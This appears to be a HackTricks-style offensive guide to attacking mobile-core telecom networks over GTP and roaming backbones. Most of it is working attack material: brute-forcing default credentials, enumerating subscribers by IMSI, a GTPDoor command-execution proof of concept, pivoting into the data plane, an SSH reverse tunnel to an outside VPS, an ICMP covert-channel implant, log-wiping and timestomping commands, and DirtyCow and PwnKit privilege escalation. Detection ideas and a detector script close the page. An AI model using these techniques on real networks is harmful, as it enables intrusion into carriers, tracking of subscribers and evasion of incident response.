Telecom Network Exploitation (GTP / Roaming Environments)

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

note

Mobile-core protocols (GPRS Tunnelling Protocol – GTP, control plane on UDP/2123, user plane on UDP/2152) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach core signalling planes directly. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist dramatically increases brute-force success:

bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

If the device exposes only a management VRF, pivot through a jump host first (see section 4.1 «sgsnemu + SOCKS5» below).

1.2 Host Discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Sweep UDP/2123 with masscan to list candidate GTP-C listeners, then confirm each hit with a GTP-C Echo Request: every live GTP peer must answer with an Echo Response, so a reply distinguishes a real SGSN/GGSN from a port that merely did not send ICMP unreachable.

bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
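The confirmation step described above, as an added example (not code from the page or from masscan): build a GTPv1-C Echo Request (message type 1, TEID 0, sequence number present) and parse the Echo Response (type 2), which carries the peer's Recovery IE (restart counter). The target address, the constructed sample reply and the sequence number are assumptions for illustration; MME/SGW listeners on the same port speak GTPv2, whose header differs, so this parser deliberately rejects version-2 replies.

```python
"""Minimal GTPv1-C Echo Request/Response codec to confirm live GTP-C listeners."""
import socket
import struct

GTP_C_PORT = 2123
MSG_ECHO_REQUEST = 1
MSG_ECHO_RESPONSE = 2
IE_RECOVERY = 14            # TV IE: type (1 byte) + restart counter (1 byte)


def build_echo_request(seq: int) -> bytes:
    """GTPv1 header: version=1, PT=1 (GTP, not GTP'), S=1 -> flags 0x32.
    Echo uses TEID 0. 'length' counts everything after the 8 mandatory octets,
    so with the optional seq/N-PDU/next-ext octets present it is 4."""
    flags, length, teid = 0x32, 4, 0
    return struct.pack("!BBHIHBB", flags, MSG_ECHO_REQUEST, length, teid, seq & 0xFFFF, 0, 0)


def parse_echo_response(pkt: bytes):
    """Return (seq, restart_counter) for a well-formed GTPv1 Echo Response, else None."""
    if len(pkt) < 8:
        return None
    flags, msg_type, length, teid = struct.unpack("!BBHI", pkt[:8])
    if (flags >> 5) != 1 or msg_type != MSG_ECHO_RESPONSE or teid != 0:
        return None                      # not GTPv1, not an Echo Response, or bogus TEID
    if len(pkt) != 8 + length:
        return None                      # length field must match the datagram
    body = pkt[8:]
    seq = None
    if flags & 0x07:                     # any of E/S/PN set -> 4 optional octets present
        if len(body) < 4:
            return None
        seq = struct.unpack("!H", body[:2])[0]
        body = body[4:]
    restart = None
    if len(body) >= 2 and body[0] == IE_RECOVERY:
        restart = body[1]
    return seq, restart


def probe(host: str, seq: int = 1, timeout: float = 2.0):
    """Send one Echo Request to host:2123 and return the parsed reply, or None on timeout.
    Assumed usage: probe("10.1.1.100")"""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(build_echo_request(seq), (host, GTP_C_PORT))
        data, _ = s.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        s.close()
    return parse_echo_response(data)


# Constructed sample reply (not a real capture): Echo Response, seq 7, restart counter 0x2a
SAMPLE_ECHO_RESPONSE = bytes.fromhex("3202000600000000000700000e2a")
```

A changing restart counter across probes of the same node is itself a signal: it increments when the GSN restarts, so an unexpected jump means the peer rebooted (or you are talking to a different box behind the same address).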

2. Enumerating Subscribers – cordscan

The following Go tool crafts GTP-C Create PDP Context Request packets for a chosen IMSI and logs the responses. A reply tells you whether the GGSN/PGW accepts that IMSI/APN pair and, where the response carries it, which SGSN/MME is currently serving the subscriber and sometimes the visited PLMN.

bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Key flags:

  • --imsi Target subscriber IMSI
  • --oper Home / HNI (MCC+MNC)
  • -w Write raw packets to pcap

Important constants inside the binary can be patched to widen scans:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"
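The two subscriber-identifying IEs that a cordscan-style Create PDP Context Request has to carry, as an added example (not cordscan's code): the IMSI IE (type 2, fixed 8 octets of TBCD digits, odd digit counts padded with a 0xF nibble, unused octets 0xFF) and the APN IE (type 131, TLV, label-encoded like a DNS name without the terminating zero). The IMSI and APN values are the page's own; the function names are assumed.

```python
"""IMSI (TBCD) and APN IE encoders/decoders for GTPv1-C Create PDP Context Request."""
import struct
from typing import Optional

IE_IMSI = 2          # TV IE, fixed 8 octets, TBCD digits
IE_APN = 131         # TLV IE, 2-byte length, DNS-style labels


def tbcd_encode(digits: str, octets: Optional[int] = None) -> bytes:
    """Pack decimal digits as TBCD: first digit in the low nibble, odd counts padded
    with 0xF, optionally filled to a fixed width with 0xFF octets."""
    if not digits.isdigit():
        raise ValueError("TBCD needs decimal digits")
    if len(digits) % 2:
        digits += "F"
    out = bytes(int(digits[i + 1] + digits[i], 16) for i in range(0, len(digits), 2))
    if octets is not None:
        if len(out) > octets:
            raise ValueError("too many digits for the IE width")
        out += b"\xff" * (octets - len(out))
    return out


def tbcd_decode(raw: bytes) -> str:
    """Unpack TBCD, stopping at the first 0xF filler nibble."""
    digits = ""
    for b in raw:
        for nib in (b & 0x0F, b >> 4):
            if nib == 0xF:
                return digits
            digits += str(nib)
    return digits


def imsi_ie(imsi: str) -> bytes:
    """IMSI IE: type octet + 8 TBCD octets (IMSI is 6..15 digits)."""
    if not 6 <= len(imsi) <= 15:
        raise ValueError("IMSI is 6-15 digits")
    return bytes([IE_IMSI]) + tbcd_encode(imsi, octets=8)


def parse_imsi_ie(raw: bytes) -> str:
    if len(raw) < 9 or raw[0] != IE_IMSI:
        raise ValueError("not an IMSI IE")
    return tbcd_decode(raw[1:9])


def apn_ie(apn: str) -> bytes:
    """APN IE: type, 2-byte length, then <len><label> for each dot-separated label."""
    value = b"".join(bytes([len(label)]) + label.encode() for label in apn.split("."))
    return bytes([IE_APN]) + struct.pack("!H", len(value)) + value


def parse_apn_ie(raw: bytes) -> str:
    if len(raw) < 3 or raw[0] != IE_APN:
        raise ValueError("not an APN IE")
    (length,) = struct.unpack("!H", raw[1:3])
    value, labels, pos = raw[3:3 + length], [], 0
    while pos < len(value):
        n = value[pos]
        labels.append(value[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)
```

Getting the nibble order wrong is the classic mistake: a swapped encoder still produces an 8-octet IE that most GGSNs silently reject, which looks exactly like "subscriber unknown" and sends you hunting in the wrong place. Widening a scan across a PLMN means iterating the MSIN part of the IMSI while keeping the MCC+MNC prefix (the --oper value) fixed.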

3. Code Execution over GTP – GTPDoor

GTPDoor is a tiny ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. The stdout/stderr are exfiltrated inside Echo Response messages so that no outward session is ever created.

Minimal PoC packet (Python):

python
# PyCryptodome provides Crypto.Cipher.AES; `gtpc` is the page's own helper that wraps the blob
# in a GTP-C Echo Request (it is not a public library)
from Crypto.Cipher import AES
import gtpc

key = b"SixteenByteKey!!"            # AES-128 needs exactly 16 bytes (a 15-byte key raises ValueError)
cmd = b"id;uname -a"
blob = cmd.ljust(32, b"\x00")        # zero-pad to a multiple of the 16-byte block size
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).encrypt(blob)
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

  • any host sending Echo Requests to SGSN/GGSN IPs that never receive (or never send) matching Echo Responses
  • Echo Requests (message type 1) carrying a payload: per spec an Echo Request has no mandatory IEs, and the only legal optional one is the Private Extension IE (type 255), so any other body, or an oversized Private Extension, is an implant command

4. Pivoting Through the Core

4.1 sgsnemu + SOCKS5

OsmoGGSN (formerly OpenGGSN) ships sgsnemu, an SGSN emulator that establishes a PDP context towards a real GGSN/PGW. Once the context is negotiated, sgsnemu creates a tun interface (tun0) holding the assigned end-user address, so traffic you route through it enters the operator's data plane as if it came from a roaming subscriber.

bash
# sgsnemu option names as listed by `sgsnemu --help`: --listen = local SGSN address,
# --remote = target GGSN, one context for the IMSI/APN pair, --createif builds tun0
sgsnemu --listen 10.1.1.10 --remote 10.1.1.100 --imsi 404995112345678 \
        --apn internet --contexts 1 --createif --debug
ip route add 172.16.0.0/12 dev tun0   # push the internal data-plane ranges into the tunnel
microsocks -p 1080 &                   # internal SOCKS proxy

With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home:

bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Check that GatewayPorts yes is enabled on the VPS, and log in there as root: sshd binds the remote-forwarded port with the privileges of the logged-in user, and 53 is a privileged port, so the -R binding silently fails for an unprivileged account.

5. Covert Channels

Channel / transport / decoding / notes:

  • ICMP – EchoBackdoor: ICMP Echo Request/Reply; 4-byte key + 14-byte chunks (XOR); pure passive listener, no outbound traffic.
  • DNS – NoDepDNS: UDP 53; XOR (key = funnyAndHappy) encoded in A-record octets; watches for *.nodep sub-domains.
  • GTP – GTPDoor: UDP 2123; AES-128-CBC blob in a Private Extension IE; blends with legitimate GTP-C chatter.

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
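The ICMP channel from the table, as an added example (not EchoBackdoor's code): the 4-byte key prefix, 14-byte XOR chunks and passive reassembly are taken from the description above, while the exact payload layout (key || XOR(chunk, key), chunk index in the ICMP sequence field), the key value and the command are assumptions. The checksum and header code is the real ICMP format, so the packets can be fed to a raw socket; the detector at the end is the simplest heuristic for Detection Idea 4, using the stock Linux ping payload (8-byte timestamp followed by bytes whose value equals their offset) as the known-good shape.

```python
"""ICMP echo covert channel (key || XOR chunks) with a passive listener and a payload detector."""
import struct

KEY = b"\xde\xad\xbe\xef"   # assumed 4-byte pre-shared key (constructed for the example)
CHUNK = 14                  # 14 data bytes per packet, as described for EchoBackdoor


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum; returns 0 when run over a packet whose checksum is correct."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    s = (s >> 16) + (s & 0xFFFF)
    s += s >> 16
    return (~s) & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes, reply: bool = False) -> bytes:
    """ICMP Echo Request (type 8) or Reply (type 0) with a valid checksum."""
    icmp_type = 0 if reply else 8
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def xor_key(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_command(cmd: bytes, key: bytes = KEY, ident: int = 0x1337) -> list:
    """Split cmd into 14-byte chunks; packet i carries key || XOR(chunk_i, key) with seq = i."""
    pkts = []
    for seq, off in enumerate(range(0, len(cmd), CHUNK), start=1):
        chunk = cmd[off:off + CHUNK]
        pkts.append(build_echo(ident, seq, key + xor_key(chunk, key)))
    return pkts


def passive_listener(pkts, key: bytes = KEY) -> bytes:
    """Reassemble a command from sniffed echo requests that start with the key.
    Ordinary pings are ignored and nothing is ever sent back."""
    chunks = {}
    for p in pkts:
        if len(p) < 8 + len(key):
            continue
        icmp_type, _code, _csum, _ident, seq = struct.unpack("!BBHHH", p[:8])
        if icmp_type != 8 or icmp_checksum(p) != 0:
            continue                              # not an echo request / corrupted
        payload = p[8:]
        if not payload.startswith(key):
            continue                              # a normal ping: leave it alone
        chunks[seq] = xor_key(payload[len(key):], key)
    return b"".join(chunks[s] for s in sorted(chunks))


# Stock Linux (iputils) ping body: 8-byte timestamp, then 48 bytes whose value equals their offset
LINUX_PING_PATTERN = bytes(range(0x08, 0x38))
NORMAL_PING = build_echo(0x1234, 1, b"\x00" * 8 + LINUX_PING_PATTERN)   # constructed sample


def looks_like_covert(p: bytes) -> bool:
    """Detection heuristic: any echo payload that is not the stock 56-byte ping body."""
    payload = p[8:]
    return not (len(payload) == 56 and payload[8:] == LINUX_PING_PATTERN)
```

The detector is deliberately strict: Windows ping sends a 32-byte alphabet payload and monitoring probes use their own patterns, so in production each legitimate shape is added to the allow-list rather than loosening the check. Unbalanced echo requests (no reply from the implant host) and short, fixed-size payloads are the two properties a covert channel built this way cannot hide.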

6. Defense Evasion Cheatsheet

bash
# Remove attacker IPs from wtmp (utmpdump -r rebuilds the binary file from the filtered text dump)
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history for this session
export HISTFILE=/dev/null

# Masquerade as kernel thread: /proc/<pid>/comm is the name top/htop display by default.
# ps aux and /proc/<pid>/cmdline still hold the real argv, and the [brackets] only appear
# for processes with an empty cmdline, so this hides the name, not the binary.
printf 'kworker/1:0' > /proc/$$/comm

touch -r /usr/bin/time /usr/bin/chargen   # timestomp: copy atime/mtime from a legitimate binary
setenforce 0                              # SELinux to permissive (needs root, and is itself audit-logged)

7. Privilege Escalation on Legacy NE

bash
# DirtyCow – CVE-2016-5195 (FireFart's dirty.c: needs -lcrypt, adds a root user "firefart"
# with the password given as argument and backs up the original file to /tmp/passwd.bak)
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty 'NewP4ss!'

# PwnKit – CVE-2021-4034 (pkexec)
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Clean-up tip:

bash
# Restore the passwd backup dirty.c left behind; fall back to deleting the injected user
mv /tmp/passwd.bak /etc/passwd 2>/dev/null || userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tool Box

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in previous sections.
  • FScan : intranet TCP sweeps (fscan -h 10.0.0.0/24 -p 22,80,443)
  • Responder : LLMNR/NBT-NS rogue WPAD
  • Microsocks + ProxyChains : lightweight SOCKS5 pivoting
  • FRP (≥0.37) : NAT traversal / asset bridging

Detection Ideas

  1. Create PDP Context Requests from any source that is not a known SGSN (in GTPv1 only an SGSN sends them; the GTPv2 equivalent is a Create Session Request, which only an MME/SGW should originate).
  2. SSH handshakes (the SSH-2.0- banner) on non-standard ports (53, 80, 443) from internal IPs.
  3. Echo Requests without corresponding Echo Responses, or Echo Requests carrying a payload beyond the header (a spec-compliant Echo Request has no mandatory IEs) – likely GTPDoor beacons.
  4. ICMP echo traffic whose payload deviates from the stock ping body, or a high rate of echo replies with unusual identifier/sequence values.
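Detection Ideas 1 and 3 (and the GTPDoor detection bullets in section 3) implemented over a batch of GTP-C datagrams, as an added example (not code from the page or any named tool): parse the GTPv1 header, flag Create PDP Context Requests from addresses outside an SGSN inventory (extracting the IMSI from the leading IMSI IE for the alert), flag Echo Requests that carry a payload, and count per-host Echo Requests that never see an Echo Response. The SGSN inventory, the IP addresses and the sample records are constructed; the beacon records mimic the GTPDoor PoC above by carrying the MAG1C tag plus a blob inside an Echo Request.

```python
"""Flag anomalous GTPv1-C traffic: foreign PDP-context requests, Echo Requests with payload, unanswered echoes."""
import struct
from collections import Counter

MSG_ECHO_REQUEST, MSG_ECHO_RESPONSE, MSG_CREATE_PDP_REQUEST = 1, 2, 16
IE_IMSI, IE_PRIVATE_EXTENSION = 2, 255
KNOWN_SGSNS = {"10.1.1.10", "10.1.1.11"}   # assumed inventory of legitimate SGSNs (constructed)
UNANSWERED_THRESHOLD = 3


def gtp_header(pkt: bytes):
    """Return (version, msg_type, body) for a GTPv1 datagram, or None if malformed."""
    if len(pkt) < 8:
        return None
    flags, msg_type, length, _teid = struct.unpack("!BBHI", pkt[:8])
    if len(pkt) != 8 + length:
        return None
    body = pkt[8:]
    if flags & 0x07:                        # optional seq/N-PDU/next-ext octets present
        if len(body) < 4:
            return None
        body = body[4:]
    return flags >> 5, msg_type, body


def tbcd_decode(raw: bytes) -> str:
    digits = ""
    for b in raw:
        for nib in (b & 0x0F, b >> 4):
            if nib == 0xF:
                return digits
            digits += str(nib)
    return digits


def extract_imsi(body: bytes):
    """GTPv1 IEs are ordered by type, so an IMSI IE (type 2, 8 octets) leads the body."""
    if len(body) >= 9 and body[0] == IE_IMSI:
        return tbcd_decode(body[1:9])
    return None


def analyse(records) -> list:
    """records: iterable of (src_ip, dst_ip, udp_payload). Returns alert strings in order."""
    alerts, echo_req, echo_rsp = [], Counter(), Counter()
    for src, dst, raw in records:
        parsed = gtp_header(raw)
        if parsed is None:
            alerts.append(f"malformed GTP datagram from {src}")
            continue
        version, msg_type, body = parsed
        if version != 1:
            continue                        # GTPv2 (MME/SGW) would need its own parser
        if msg_type == MSG_ECHO_REQUEST:
            echo_req[src] += 1
            if body and body[0] != IE_PRIVATE_EXTENSION:
                alerts.append(f"echo request with unexpected payload from {src} ({len(body)} bytes)")
            elif body:
                alerts.append(f"echo request with private extension from {src}")
        elif msg_type == MSG_ECHO_RESPONSE:
            echo_rsp[dst] += 1              # credited to the host that asked
        elif msg_type == MSG_CREATE_PDP_REQUEST and src not in KNOWN_SGSNS:
            alerts.append(f"create pdp context request from non-SGSN {src} imsi={extract_imsi(body)}")
    for host, n in echo_req.items():
        if n >= UNANSWERED_THRESHOLD and echo_rsp[host] == 0:
            alerts.append(f"{n} unanswered echo requests from {host}")
    return alerts


def build_gtp(msg_type: int, body: bytes = b"", seq: int = 1) -> bytes:
    """GTPv1 datagram with S flag set (flags 0x32), TEID 0, used to construct the samples."""
    return struct.pack("!BBHIHBB", 0x32, msg_type, 4 + len(body), 0, seq, 0, 0) + body


IMSI_IE_SAMPLE = bytes.fromhex("0204945911325476f8")           # IMSI 404995112345678
BEACON = b"MAG1C" + b"\x00" * 27                                # GTPDoor-style tag + 27-byte blob
SAMPLE_RECORDS = [                                              # constructed, not a capture
    ("10.1.1.10", "10.1.1.100", build_gtp(MSG_ECHO_REQUEST)),
    ("10.1.1.100", "10.1.1.10", build_gtp(MSG_ECHO_RESPONSE, bytes([14, 1]))),
    ("10.9.9.9", "10.1.1.100", build_gtp(MSG_ECHO_REQUEST, BEACON, seq=1)),
    ("10.9.9.9", "10.1.1.100", build_gtp(MSG_ECHO_REQUEST, BEACON, seq=2)),
    ("10.9.9.9", "10.1.1.100", build_gtp(MSG_ECHO_REQUEST, BEACON, seq=3)),
    ("10.9.9.9", "10.1.1.100", build_gtp(MSG_CREATE_PDP_REQUEST, IMSI_IE_SAMPLE)),
]
```

In a real deployment the records come from a span port or pcap on the GRX-facing interface, and the SGSN inventory from the roaming partner list (IR.21 data); the Private Extension case is kept as a separate, lower-severity alert because a few vendors do use it legitimately, but the extension identifier (first two octets of its value) should then match a known vendor.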
